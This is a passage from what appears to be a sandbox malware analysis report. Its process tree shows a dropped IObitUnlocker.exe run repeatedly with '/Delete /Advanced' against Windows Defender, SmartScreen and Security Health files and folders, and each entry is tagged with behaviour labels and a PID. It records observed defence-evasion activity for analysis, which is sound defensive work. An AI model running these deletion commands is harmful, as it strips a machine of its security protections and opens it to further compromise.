Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4168
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1816
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2412
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3396
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4480
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1496
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1796
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2332
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:776
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5796
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5448
